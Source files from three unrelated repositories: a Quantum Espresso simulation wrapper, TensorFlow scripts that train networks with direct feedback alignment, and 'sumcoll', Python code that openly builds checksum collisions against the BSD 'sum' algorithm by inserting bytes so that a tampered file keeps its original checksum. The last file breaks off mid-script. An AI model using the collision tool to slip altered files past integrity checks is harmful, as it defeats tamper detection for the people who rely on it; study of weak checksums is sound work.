if self.params["PLOT"]["iflag"] == (2 or 3):
self.params["PLOT"][f"e2 ({1})"] = 0
self.params["PLOT"][f"e2 ({2})"] = 1
self.params["PLOT"][f"e2 ({3})"] = 0
self.params["PLOT"]["ny"] = 101
if self.params["PLOT"]["iflag"] == 3:
self.params["PLOT"][f"e3 ({1})"] = 0
self.params["PLOT"][f"e3 ({2})"] = 0
self.params["PLOT"][f"e3 ({3})"] = 1
self.params["PLOT"]["nz"] = 101
if self.params["PLOT"]["iflag"] == 4:
self.params["PLOT"]["radius"] == 1
self.params["PLOT"]["nx"] = 101
self.params["PLOT"]["ny"] = 101
if self.params["PLOT"]["output_format"] == (0 or 7):
self.params["PLOT"]["fileout"] = self.params["PLOT"]["fileout"][:-4] + "plt"
elif self.params["PLOT"]["output_format"] == 6:
self.params["PLOT"]["fileout"] = self.params["PLOT"]["fileout"][:-4] + "pltrho"
elif self.params["PLOT"]["output_format"] == 6:
self.params["PLOT"]["fileout"] = self.params["PLOT"]["fileout"][:-4] + "cub"
super()._create_input(sim, **kwargs)
def _update_cuds(self, sim):
sim.add(QE.XSF(path = self._file_path_root + self._session._prefix + ".pp.xsf"))
super()._update_cuds(sim)
class phUtils(qeUtils):
def _create_input(self, sim, **kwargs):
self.params = {
"INPUTPH": {
"outdir": ".",
"prefix": f"{self._session._prefix}",
"fildyn": f"{self._session._prefix}.ph.dyn"
}
}
self.qpoints = []
for point in sim.get(oclass = QE.QPoint):
if point.calculate == True:
self.qpoints.append(point)
try:
if self.params["ldisp"] != ".true." and self.params["qplot"] != ".true.":
self.sysinfo = {
"": [["0 0 0"]]
# TODO: manual q point
# TODO: add support for multiple q points
}
else:
self.sysinfo = {}
except:
self.sysinfo = {}
super()._modify_input(sim, **kwargs)
super()._create_input(sim, **kwargs)
def _update_cuds(self, sim):
sim.add(QE.PhOut(path = self._file_path_root + self._session._output_file))
with open(self._file_path_root + self._session._output_file, 'r') as file:
lines = file.readlines()
beginend = []
for i, line in enumerate(lines):
if line.startswith(" ****"):
beginend.append(i)
q_point = self.qpoints[0]
for i in range(beginend[0]+1, beginend[1]):
freq = float(lines[i].split()[4])
modenum = int(lines[i].split()[2][:-1])
unit = lines[i].split()[5][1:-1]
for mode in q_point.get(oclass = QE.Mode):
if mode.number == modenum:
if mode.get(oclass = QE.Frequency):
mode.get(oclass = QE.Frequency)[0].value = freq
mode.get(oclass = QE.Frequency)[0].unit = unit
else:
mode.add(QE.Frequency(value = freq, unit = unit))
super()._update_cuds(sim)
class cliUtils(qeUtils):
def _modify_input(self, sim, **kwargs):
for key, value in kwargs.items():
self.params.update(value)
def _update_cuds(self, sim):
pass
class plotbandUtils(cliUtils):
def _create_input(self, sim, **kwargs):
self.params = {
"Input file": "1",
"Emin, Emax": "2",
"gnuplot": "3",
"ps": "4",
"Efermi": "5",
"deltaE": "6"
}
super()._modify_input(sim, **kwargs)
def _update_cuds(self, sim):
pass
class evUtils(cliUtils):
def _create_input(self, sims, **kwargs):
with open(self._file_path_root + self._session._input_file, "w+") as f:
for s in sims:
total_energy = simple_search.find_cuds_objects_by_oclass(oclass = QE.TotalEnergy, root = s, rel = QE.HAS_PART)[0].value
volume = simple_search.find_cuds_objects_by_oclass(oclass = QE.Volume, root = s, rel = QE.HAS_PART)[0].value
f.write(f"{volume} {total_energy}\n")
self.params = {
"Lattice parameter": "au",
"type": "noncubic",
"equation of state": self._session._calculation_type,
"Input": self._file_path_root + self._session._input_file,
"Output": self._file_path_root + self._session._output_file,
}
super()._modify_input(sim, **kwargs)
def _update_cuds(self, sims):
# Updates equilibrium volume and bulk modulus.
with open(self._file_path_root + self._session._output_file, 'r') as file:
lines = file.readlines()
v0 = lines[1].split()[3]
b0 = lines[1].split()[6][1:]
for s in sims:
volume_entity = s.get(oclass = QE.Cell)[0].get(oclass = QE.EquilibriumVolume)
modulus_entity = s.get(oclass = QE.BulkModulus)
if volume_entity:
volume_entity[0].value = float(v0)
volume_entity[0].unit = "au^3"
else:
s.get(oclass = QE.Cell)[0].add(QE.EquilibriumVolume(value = v0, unit = "au^3"))
if modulus_entity:
modulus_entity[0].value = float(b0)
volume_entity[0].unit = "kbar"
else:
s.add(QE.BulkModulus(value = b0, unit = "kbar"))
# class alpha2fUtils(qeUtils):
# def _create_input(self, sim, **kwargs):
# self.params = {
# "INPUTPH": {
# "outdir": "'.'",
# "prefix": f"'{self._session._prefix}'",
# "fildyn": f"'{self._session._prefix}.ph.dyn'"
# },
# "INPUTa2F": {
# "nfreq": 500
# }
# }
# super()._modify_input(sim, **kwargs)
# super()._create_input(sim, **kwargs)
# def _update_cuds(self, sim):
# sim.add(QE.A2fDat)
# super()._update_cuds(sim)
# # class epaUtils(qeUtils):
# # def _create_input(self, sim, **kwargs):
# # with open(self._file_path_root + self._session._input_file, "w+") as file:
# class dynmatUtils(qeUtils):
# def _create_input(self, sim, **kwargs):
# super()._modify_input(sim, **kwargs)
# super()._create_input(sim, **kwargs)
--- FILE SEPARATOR ---
from setuptools import setup, find_packages
#Read description
with open('README.md', 'r') as readme:
README_TEXT = readme.read()
#Main setup configuration class
setup(
name = 'quantum-espresso',
version = '1.0',
author = 'Materials Informatics team, Fraunhofer IWM',
description = 'Simulation wrapper for Quantum Espresso/SimPhoNy',
long_description = README_TEXT,
packages = find_packages(),
test_suite = 'tests',
entry_points={
'wrappers':
'quantumespresso = osp.wrappers.quantumespresso:QESession'
},
install_requires = ['osp-core>=3.4.0']
)
|
[
"/examples/Si_simple.py",
"/examples/pw_short_example.py",
"/examples/pw_short_example_osp.py",
"/osp/wrappers/quantumespresso/qe_engine.py",
"/osp/wrappers/quantumespresso/qe_session.py",
"/osp/wrappers/quantumespresso/qe_utils.py",
"/setup.py"
] |
00mjk/ssdfa
|
import argparse
import os
import sys
##############################################
parser = argparse.ArgumentParser()
parser.add_argument('--epochs', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--eps', type=float, default=1e-5)
parser.add_argument('--dropout', type=float, default=0.5)
parser.add_argument('--act', type=str, default='relu')
parser.add_argument('--bias', type=float, default=0.)
parser.add_argument('--gpu', type=int, default=0)
parser.add_argument('--dfa', type=int, default=0)
parser.add_argument('--sparse', type=int, default=0)
parser.add_argument('--rank', type=int, default=0)
parser.add_argument('--init', type=str, default="glorot_uniform")
parser.add_argument('--save', type=int, default=0)
parser.add_argument('--name', type=str, default="cifar10_fc")
parser.add_argument('--load', type=str, default=None)
args = parser.parse_args()
if args.gpu >= 0:
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=str(args.gpu)
##############################################
import tensorflow as tf
import keras
import numpy as np
from lib.Model import Model
from lib.Layer import Layer
from lib.ConvToFullyConnected import ConvToFullyConnected
from lib.FullyConnected import FullyConnected
from lib.Convolution import Convolution
from lib.MaxPool import MaxPool
from lib.Dropout import Dropout
from lib.FeedbackFC import FeedbackFC
from lib.FeedbackConv import FeedbackConv
from lib.Activation import Relu
from lib.Activation import Tanh
##############################################
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
train_examples = 50000
test_examples = 10000
assert(np.shape(x_train) == (train_examples, 32, 32, 3))
x_train = x_train - np.mean(x_train, axis=0, keepdims=True)
x_train = x_train / np.std(x_train, axis=0, keepdims=True)
y_train = keras.utils.to_categorical(y_train, 10)
assert(np.shape(x_test) == (test_examples, 32, 32, 3))
x_test = x_test - np.mean(x_test, axis=0, keepdims=True)
x_test = x_test / np.std(x_test, axis=0, keepdims=True)
y_test = keras.utils.to_categorical(y_test, 10)
##############################################
if args.act == 'tanh':
act = Tanh()
elif args.act == 'relu':
act = Relu()
else:
assert(False)
##############################################
tf.set_random_seed(0)
tf.reset_default_graph()
batch_size = tf.placeholder(tf.int32, shape=())
dropout_rate = tf.placeholder(tf.float32, shape=())
lr = tf.placeholder(tf.float32, shape=())
X = tf.placeholder(tf.float32, [None, 32, 32, 3])
Y = tf.placeholder(tf.float32, [None, 10])
l0 = ConvToFullyConnected(input_shape=[32, 32, 3])
l1 = Dropout(rate=0.1)
l2 = FullyConnected(input_shape=3072, size=1000, init=args.init, activation=act, bias=args.bias, name='fc1')
l3 = Dropout(rate=dropout_rate)
l4 = FeedbackFC(size=[3072, 1000], num_classes=10, sparse=args.sparse, rank=args.rank, name='fc1_fb')
l5 = FullyConnected(input_shape=1000, size=1000, init=args.init, activation=act, bias=args.bias, name='fc2')
l6 = Dropout(rate=dropout_rate)
l7 = FeedbackFC(size=[1000, 1000], num_classes=10, sparse=args.sparse, rank=args.rank, name='fc2_fb')
l8 = FullyConnected(input_shape=1000, size=1000, init=args.init, activation=act, bias=args.bias, name='fc3')
l9 = Dropout(rate=dropout_rate)
l10 = FeedbackFC(size=[1000, 1000], num_classes=10, sparse=args.sparse, rank=args.rank, name='fc3_fb')
l11 = FullyConnected(input_shape=1000, size=10, init=args.init, bias=args.bias, name='fc4')
##############################################
model = Model(layers=[l0, l1, l2, l3, l4, l5, l6, l7, l8, l9, l10, l11])
predict = model.predict(X=X)
weights = model.get_weights()
if args.dfa:
grads_and_vars = model.dfa_gvs(X=X, Y=Y)
else:
grads_and_vars = model.gvs(X=X, Y=Y)
train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars=grads_and_vars)
correct = tf.equal(tf.argmax(predict,1), tf.argmax(Y,1))
total_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
##############################################
sess = tf.InteractiveSession()
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
##############################################
filename = args.name + '.results'
f = open(filename, "w")
f.write(filename + "\n")
f.write("total params: " + str(model.num_params()) + "\n")
f.close()
##############################################
train_accs = []
test_accs = []
for ii in range(args.epochs):
#############################
_total_correct = 0
for jj in range(0, train_examples, args.batch_size):
s = jj
e = min(jj + args.batch_size, train_examples)
b = e - s
xs = x_train[s:e]
ys = y_train[s:e]
_correct, _ = sess.run([total_correct, train], feed_dict={batch_size: b, dropout_rate: args.dropout, lr: args.lr, X: xs, Y: ys})
_total_correct += _correct
train_acc = 1.0 * _total_correct / (train_examples - (train_examples % args.batch_size))
train_accs.append(train_acc)
#############################
_total_correct = 0
for jj in range(0, test_examples, args.batch_size):
s = jj
e = min(jj + args.batch_size, test_examples)
b = e - s
xs = x_test[s:e]
ys = y_test[s:e]
_correct = sess.run(total_correct, feed_dict={batch_size: b, dropout_rate: 0.0, lr: 0.0, X: xs, Y: ys})
_total_correct += _correct
test_acc = 1.0 * _total_correct / (test_examples - (test_examples % args.batch_size))
test_accs.append(test_acc)
#############################
p = "%d | train acc: %f | test acc: %f" % (ii, train_acc, test_acc)
print (p)
f = open(filename, "a")
f.write(p + "\n")
f.close()
##############################################
if args.save:
[w] = sess.run([weights], feed_dict={})
w['train_acc'] = train_accs
w['test_acc'] = test_accs
np.save(args.name, w)
##############################################
--- FILE SEPARATOR ---
import numpy as np
import os
import copy
import threading
import argparse
from results import get_runs
##############################################
runs = get_runs()
##############################################
results = {}
num_runs = len(runs)
for ii in range(num_runs):
param = runs[ii]
name = '%s_%f_%f_%s_%f_%f_%d_%d_%s.npy' % (param['benchmark'],
param['lr'],
param['eps'],
param['act'],
param['bias'],
param['dropout'],
param['dfa'],
param['sparse'],
param['init']
)
res = np.load(name, allow_pickle=True).item()
key = (param['benchmark'], param['dfa'], param['sparse'])
val = max(res['test_acc'])
print (name, val)
if key in results.keys():
if results[key][0] < val:
results[key] = (val, param['benchmark'], param['lr'], param['eps'], param['act'], param['bias'], param['dfa'], param['sparse'], param['init'], name)
else:
results[key] = (val, param['benchmark'], param['lr'], param['eps'], param['act'], param['bias'], param['dfa'], param['sparse'], param['init'], name)
for key in sorted(results.keys()):
print (key, results[key])
--- FILE SEPARATOR ---
import argparse
import os
import sys
##############################################
parser = argparse.ArgumentParser()
parser.add_argument('--epochs', type=int, default=100)
parser.add_argument('--batch_size', type=int, default=128)
parser.add_argument('--lr', type=float, default=1e-2)
parser.add_argument('--eps', type=float, default=1.)
parser.add_argument('--dropout', type=float, default=0.5)
parser.add_argument('--act', type=str, default='relu')
parser.add_argument('--bias', type=float, default=0.)
parser.add_argument('--gpu', type=int, default=0)
parser.add_argument('--dfa', type=int, default=0)
parser.add_argument('--sparse', type=int, default=0)
parser.add_argument('--rank', type=int, default=0)
parser.add_argument('--init', type=str, default="glorot_uniform")
parser.add_argument('--save', type=int, default=0)
parser.add_argument('--name', type=str, default="imagenet_alexnet")
parser.add_argument('--load', type=str, default=None)
args = parser.parse_args()
if args.gpu >= 0:
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=str(args.gpu)
exxact = 0
if exxact:
val_path = '/home/bcrafton3/Data_SSD/ILSVRC2012/val/'
train_path = '/home/bcrafton3/Data_SSD/ILSVRC2012/train/'
else:
val_path = '/usr/scratch/bcrafton/ILSVRC2012/val/'
train_path = '/usr/scratch/bcrafton/ILSVRC2012/train/'
val_labels = './imagenet_labels/validation_labels.txt'
train_labels = './imagenet_labels/train_labels.txt'
IMAGENET_MEAN = [123.68, 116.78, 103.94]
##############################################
import keras
import tensorflow as tf
import numpy as np
np.set_printoptions(threshold=1000)
from lib.Model import Model
from lib.Layer import Layer
from lib.ConvToFullyConnected import ConvToFullyConnected
from lib.FullyConnected import FullyConnected
from lib.Convolution import Convolution
from lib.MaxPool import MaxPool
from lib.Dropout import Dropout
from lib.FeedbackFC import FeedbackFC
from lib.FeedbackConv import FeedbackConv
from lib.Activation import Activation
from lib.Activation import Relu
##############################################
def in_top_k(x, y, k):
x = tf.cast(x, dtype=tf.float32)
y = tf.cast(y, dtype=tf.int32)
_, topk = tf.nn.top_k(input=x, k=k)
topk = tf.transpose(topk)
correct = tf.equal(y, topk)
correct = tf.cast(correct, dtype=tf.int32)
correct = tf.reduce_sum(correct, axis=0)
return correct
##############################################
# Preprocessing (for both training and validation):
# (1) Decode the image from jpg format
# (2) Resize the image so its smaller side is 256 pixels long
def parse_function(filename, label):
image_string = tf.read_file(filename)
image_decoded = tf.image.decode_jpeg(image_string, channels=3) # (1)
image = tf.cast(image_decoded, tf.float32)
smallest_side = 256.0
height, width = tf.shape(image)[0], tf.shape(image)[1]
height = tf.to_float(height)
width = tf.to_float(width)
scale = tf.cond(tf.greater(height, width),
lambda: smallest_side / width,
lambda: smallest_side / height)
new_height = tf.to_int32(height * scale)
new_width = tf.to_int32(width * scale)
resized_image = tf.image.resize_images(image, [new_height, new_width]) # (2)
return resized_image, label
# Preprocessing (for training)
# (3) Take a random 227x227 crop to the scaled image
# (4) Horizontally flip the image with probability 1/2
# (5) Substract the per color mean `IMAGENET_MEAN`
# Note: we don't normalize the data here, as VGG was trained without normalization
def train_preprocess(image, label):
crop_image = tf.random_crop(image, [227, 227, 3]) # (3)
flip_image = tf.image.random_flip_left_right(crop_image) # (4)
means = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
centered_image = flip_image - means # (5)
return centered_image, label
# Preprocessing (for validation)
# (3) Take a central 227x227 crop to the scaled image
# (4) Substract the per color mean `IMAGENET_MEAN`
# Note: we don't normalize the data here, as VGG was trained without normalization
def val_preprocess(image, label):
crop_image = tf.image.resize_image_with_crop_or_pad(image, 227, 227) # (3)
means = tf.reshape(tf.constant(IMAGENET_MEAN), [1, 1, 3])
centered_image = crop_image - means # (4)
return centered_image, label
##############################################
def get_validation_dataset():
label_counter = 0
validation_images = []
validation_labels = []
print ("building validation dataset")
for subdir, dirs, files in os.walk(val_path):
for file in files:
validation_images.append(os.path.join(val_path, file))
validation_images = sorted(validation_images)
validation_labels_file = open(val_labels)
lines = validation_labels_file.readlines()
for ii in range(len(lines)):
validation_labels.append(int(lines[ii]))
remainder = len(validation_labels) % args.batch_size
validation_images = validation_images[:(-remainder)]
validation_labels = validation_labels[:(-remainder)]
return validation_images, validation_labels
def get_train_dataset():
label_counter = 0
training_images = []
training_labels = []
f = open(train_labels, 'r')
lines = f.readlines()
labels = {}
for line in lines:
line = line.split(' ')
labels[line[0]] = label_counter
label_counter += 1
f.close()
print ("building train dataset")
for subdir, dirs, files in os.walk(train_path):
for folder in dirs:
for folder_subdir, folder_dirs, folder_files in os.walk(os.path.join(subdir, folder)):
for file in folder_files:
training_images.append(os.path.join(folder_subdir, file))
training_labels.append(labels[folder])
remainder = len(training_labels) % args.batch_size
training_images = training_images[:(-remainder)]
training_labels = training_labels[:(-remainder)]
return training_images, training_labels
###############################################################
filename = tf.placeholder(tf.string, shape=[None])
label = tf.placeholder(tf.int64, shape=[None])
###############################################################
val_imgs, val_labs = get_validation_dataset()
val_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
val_dataset = val_dataset.shuffle(len(val_imgs))
val_dataset = val_dataset.map(parse_function, num_parallel_calls=4)
val_dataset = val_dataset.map(val_preprocess, num_parallel_calls=4)
val_dataset = val_dataset.batch(args.batch_size)
val_dataset = val_dataset.repeat()
val_dataset = val_dataset.prefetch(8)
###############################################################
train_imgs, train_labs = get_train_dataset()
train_dataset = tf.data.Dataset.from_tensor_slices((filename, label))
train_dataset = train_dataset.shuffle(len(train_imgs))
train_dataset = train_dataset.map(parse_function, num_parallel_calls=4)
train_dataset = train_dataset.map(train_preprocess, num_parallel_calls=4)
train_dataset = train_dataset.batch(args.batch_size)
train_dataset = train_dataset.repeat()
train_dataset = train_dataset.prefetch(8)
###############################################################
handle = tf.placeholder(tf.string, shape=[])
iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, train_dataset.output_shapes)
features, labels = iterator.get_next()
features = tf.reshape(features, (-1, 227, 227, 3))
labels = tf.one_hot(labels, depth=1000)
train_iterator = train_dataset.make_initializable_iterator()
val_iterator = val_dataset.make_initializable_iterator()
###############################################################
if args.act == 'tanh':
act = Tanh()
elif args.act == 'relu':
act = Relu()
else:
assert(False)
###############################################################
weights_conv = './transfer/alexnet_weights.npy'
weights_fc = None
train_conv = weights_conv == None
train_fc = weights_fc == None
###############################################################
batch_size = tf.placeholder(tf.int32, shape=())
dropout_rate = tf.placeholder(tf.float32, shape=())
lr = tf.placeholder(tf.float32, shape=())
###############################################################
l0 = Convolution(input_shape=[batch_size, 227, 227, 3], filter_sizes=[11, 11, 3, 96], init=args.init, strides=[1,4,4,1], padding="VALID", activation=act, bias=args.bias, load=weights_conv, name='conv1', train=train_conv)
l1 = MaxPool(size=[batch_size, 55, 55, 96], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l2 = FeedbackConv(size=[batch_size, 27, 27, 96], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv1_fb')
l3 = Convolution(input_shape=[batch_size, 27, 27, 96], filter_sizes=[5, 5, 96, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv2', train=train_conv)
l4 = MaxPool(size=[batch_size, 27, 27, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l5 = FeedbackConv(size=[batch_size, 13, 13, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv2_fb')
l6 = Convolution(input_shape=[batch_size, 13, 13, 256], filter_sizes=[3, 3, 256, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv3', train=train_conv)
l7 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv3_fb')
l8 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 384], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv4', train=train_conv)
l9 = FeedbackConv(size=[batch_size, 13, 13, 384], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv4_fb')
l10 = Convolution(input_shape=[batch_size, 13, 13, 384], filter_sizes=[3, 3, 384, 256], init=args.init, activation=act, bias=args.bias, load=weights_conv, name='conv5', train=train_conv)
l11 = MaxPool(size=[batch_size, 13, 13, 256], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID")
l12 = FeedbackConv(size=[batch_size, 6, 6, 256], num_classes=1000, sparse=args.sparse, rank=args.rank, name='conv5_fb')
l13 = ConvToFullyConnected(input_shape=[6, 6, 256])
l14 = FullyConnected(input_shape=6*6*256, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc1', train=train_fc)
l15 = Dropout(rate=dropout_rate)
l16 = FeedbackFC(size=[6*6*256, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc1_fb')
l17 = FullyConnected(input_shape=4096, size=4096, init=args.init, activation=act, bias=args.bias, load=weights_fc, name='fc2', train=train_fc)
l18 = Dropout(rate=dropout_rate)
l19 = FeedbackFC(size=[4096, 4096], num_classes=1000, sparse=args.sparse, rank=args.rank, name='fc2_fb')
l20 = FullyConnected(input_shape=4096, size=1000, init=args.init, bias=args.bias, load=weights_fc, name='fc3', train=train_fc)
###############################################################
model = Model(layers=[l0, l1, l2, l3, l4, l5, l6, l7, l8, l9, l10, l11, l12, l13, l14, l15, l16, l17, l18, l19, l20])
predict = tf.nn.softmax(model.predict(X=features))
weights = model.get_weights()
if args.dfa:
grads_and_vars = model.dfa_gvs(X=features, Y=labels)
else:
grads_and_vars = model.gvs(X=features, Y=labels)
train = tf.train.AdamOptimizer(learning_rate=lr, epsilon=args.eps).apply_gradients(grads_and_vars=grads_and_vars)
correct = tf.equal(tf.argmax(predict,1), tf.argmax(labels,1))
total_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
top5 = in_top_k(predict, tf.argmax(labels,1), k=5)
total_top5 = tf.reduce_sum(tf.cast(top5, tf.float32))
###############################################################
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
sess.run(tf.global_variables_initializer())
train_handle = sess.run(train_iterator.string_handle())
val_handle = sess.run(val_iterator.string_handle())
###############################################################
results_filename = args.name + '.results'
f = open(results_filename, "w")
f.write(results_filename + "\n")
f.write("total params: " + str(model.num_params()) + "\n")
f.close()
###############################################################
train_accs = []
train_accs_top5 = []
val_accs = []
val_accs_top5 = []
phase = 0
lr_decay = args.lr
for ii in range(args.epochs):
sess.run(train_iterator.initializer, feed_dict={filename: train_imgs, label: train_labs})
train_total = 0.0
train_correct = 0.0
train_top5 = 0.0
for j in range(0, len(train_imgs), args.batch_size):
[_total_correct, _top5, _] = sess.run([total_correct, total_top5, train], feed_dict={handle: train_handle, batch_size: args.batch_size, dropout_rate: args.dropout, lr: lr_decay})
train_total += args.batch_size
train_correct += _total_correct
train_top5 += _top5
train_acc = train_correct / train_total
train_acc_top5 = train_top5 / train_total
if (j % (1000 * args.batch_size) == 0):
p = "train accuracy: %f %f" % (train_acc, train_acc_top5)
print (p)
f = open(results_filename, "a")
f.write(p + "\n")
f.close()
train_accs.append(train_acc)
train_accs_top5.append(train_acc_top5)
##################################################################
sess.run(val_iterator.initializer, feed_dict={filename: val_imgs, label: val_labs})
val_total = 0.0
val_correct = 0.0
val_top5 = 0.0
for j in range(0, len(val_imgs), args.batch_size):
[_total_correct, _top5] = sess.run([total_correct, total_top5], feed_dict={handle: val_handle, batch_size: args.batch_size, dropout_rate: 0.0, lr: 0.0})
val_total += args.batch_size
val_correct += _total_correct
val_top5 += _top5
val_acc = val_correct / val_total
val_acc_top5 = val_top5 / val_total
if (j % (1000 * args.batch_size) == 0):
p = "val accuracy: %f %f" % (val_acc, val_acc_top5)
print (p)
f = open(results_filename, "a")
f.write(p + "\n")
f.close()
val_accs.append(val_acc)
val_accs_top5.append(val_acc_top5)
if phase == 0:
phase = 1
print ('phase 1')
elif phase == 1:
dacc = val_accs[-1] - val_accs[-2]
if dacc <= 0.01:
lr_decay = 0.1 * args.lr
phase = 2
print ('phase 2')
elif phase == 2:
dacc = val_accs[-1] - val_accs[-2]
if dacc <= 0.005:
lr_decay = 0.05 * args.lr
phase = 3
print ('phase 3')
if args.save:
[w] = sess.run([weights], feed_dict={handle: val_handle, dropout_rate: 0.0, learning_rate: 0.0})
w['train_acc'] = train_accs
w['train_acc_top5'] = train_accs_top5
w['val_acc'] = val_accs
w['val_acc_top5'] = val_accs_top5
np.save(args.name, w)
print('epoch %d/%d' % (ii, args.epochs))
--- FILE SEPARATOR ---
import tensorflow as tf
import numpy as np
import math
from lib.Layer import Layer
from lib.Activation import Activation
from lib.Activation import Linear
from lib.init_tensor import init_matrix
class FullyConnected(Layer):
def __init__(self, input_shape, size, init, activation=None, bias=0., use_bias=True, name=None, load=None, train=True):
self.input_size = input_shape
self.output_size = size
self.init = init
self.activation = Linear() if activation == None else activation
self.name = name
self.train_flag = train
self.use_bias = use_bias
if load:
print ("Loading Weights: " + self.name)
weight_dict = np.load(load, encoding='latin1', allow_pickle=True).item()
weights = weight_dict[self.name]
bias = weight_dict[self.name + '_bias']
else:
bias = np.ones(shape=self.output_size) * bias
weights = init_matrix(size=(self.input_size, self.output_size), init=self.init)
self.weights = tf.Variable(weights, dtype=tf.float32)
self.bias = tf.Variable(bias, dtype=tf.float32)
###################################################################
def get_weights(self):
return [(self.name, self.weights), (self.name + "_bias", self.bias)]
def num_params(self):
weights_size = self.input_size * self.output_size
bias_size = self.output_size
return weights_size + bias_size
def forward(self, X):
Z = tf.matmul(X, self.weights)
if self.use_bias:
Z = Z + self.bias
A = self.activation.forward(Z)
return {'aout':A, 'cache':{}}
###################################################################
def bp(self, AI, AO, DO, cache):
DO = tf.multiply(DO, self.activation.gradient(AO))
DI = tf.matmul(DO, tf.transpose(self.weights))
DW = tf.matmul(tf.transpose(AI), DO)
DB = tf.reduce_sum(DO, axis=0)
if self.train_flag:
return {'dout':DI, 'cache':{}}, [(DW, self.weights), (DB, self.bias)]
else:
return {'dout':DI, 'cache':{}}, []
def dfa(self, AI, AO, E, DO, cache):
return self.bp(AI, AO, DO, cache)
def lel(self, AI, AO, DO, Y, cache):
return self.bp(AI, AO, DO, cache)
###################################################################
|
[
"/cifar10_fc.py",
"/get_results.py",
"/imagenet_alexnet.py",
"/lib/FullyConnected.py"
] |
00mjk/sumcoll
|
#!/usr/bin/env python3
import sys, collections
import sum, backwards
# middle.py
# A meet-in-the-middle attack on the BSD sum algorithm
# We take advantage of the birthday paradox and search for prefix extensions
# and suffix extensions simultanously.
def search(start: int, end: int, charset: bytes) -> bytes:
"""
Takes a start and end checksum values and a set of characters to use.
returns the bytestring to insert to cause the desired collision
"""
prefix_candidates = collections.deque([(b'', start)])
suffix_candidates = collections.deque([(b'', end)])
prefix_hashes = {start: b''}
suffix_hashes = {end: b''}
while True:
prefix_base, cksum = prefix_candidates.popleft()
for c in charset:
new_sum = sum.add(cksum, c)
new_prefix = prefix_base + bytes([c])
suf = suffix_hashes.get(new_sum)
if suf is not None:
return new_prefix + suf
if prefix_hashes.get(new_sum) is None:
prefix_candidates.append((new_prefix, new_sum))
prefix_hashes[new_sum] = new_prefix
suffix_base, cksum = suffix_candidates.popleft()
for c in charset:
new_sum = backwards.sub(cksum, c)
new_suffix = bytes([c]) + suffix_base
pre = prefix_hashes.get(new_sum)
if pre is not None:
return pre + new_suffix
if suffix_hashes.get(new_sum) is None:
suffix_candidates.append((new_suffix, new_sum))
suffix_hashes[new_sum] = new_suffix
if __name__ == "__main__":
filename = sys.argv[1]
offset = int(sys.argv[2])
data = open(filename, 'rb').read()
start, _ = sum.compute_sum(data[:offset])
end = backwards.backwards_sum(data[offset:], 0)
charset = bytes(range(ord(' '), ord('~')+1))
added = search(start, end, charset)
print(added)
out = open(sys.argv[3], 'wb')
out.write(data[:offset])
out.write(added)
out.write(data[offset:])
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import sys, os, random
import sum
# backwards.py
# Compute the bsd `sum` algorithm in reverse
# Used for computing collisions and modifying
# somewhere in the middle of the file.
def rotate_left_16bit(data: int) -> int:
"""rotate a 16-bit value to the left"""
return (0xffff & (data << 1)) | (data >> 15)
def sub(sum: int, byte: int) -> int:
return rotate_left_16bit((sum - byte) & 0xffff)
def backwards_sum(data: bytes, sum: int) -> int:
"""
Runs the bsd sum value in reverse
The return value is what the checksum of a prefix
must have to achieve the given checksum argument
"""
for byte in reversed(data):
sum = sub(sum, byte)
return sum
def test():
"""
Test that backwards sum matches forward sums
Generates two random arrays, computes the forwards sum of both together, then
of the prefix. Compute the backwards sum of the suffix, and make sure it
matches the prefix sum.
"""
prefix = os.urandom(random.randint(10, 10000))
suffix = os.urandom(random.randint(10, 10000))
totalsum, _ = sum.compute_sum(prefix + suffix)
prefixsum, _ = sum.compute_sum(prefix)
back = backwards_sum(suffix, totalsum)
assert back == prefixsum
if __name__ == "__main__":
if len(sys.argv) == 2 and sys.argv[1] == "test":
for _ in range(0, 1000):
test()
print("tests passed")
elif len(sys.argv) != 3:
print("Usage: backwards.py file checksum")
print("backwards.py test")
else:
with open(sys.argv[1], "rb") as fp:
print(backwards_sum(fp.read(), int(sys.argv[2])))
--- FILE SEPARATOR ---
#!/usr/bin/env python3
### Sum.py
### An implementation of the BSD `sum` checksum in python.
import math, sys
from typing import Iterable, Tuple
def rotate_right_16bit(data: int) -> int:
"""rotate a 16-bit value to the right"""
return (data >> 1) | ((data & 1) << 15)
def add(sum: int, byte: int) -> int:
sum = rotate_right_16bit(sum) + byte
return sum & 0xffff # clamp to 16 bits
def compute_sum(data: bytes) -> Tuple[int, int]:
"""
Compute the BSD sum checksum over data
Returns the checksum and number of 1024 byte blocks
"""
sum = 0
for byte in data:
sum = add(sum, byte)
return sum, math.ceil(len(data) / 1024)
def format_sum(sum: int, blocks: int):
"""Format checksum and block count like sum does"""
return "{:05} {:5}".format(sum, blocks)
if __name__ == "__main__":
if len(sys.argv) > 1:
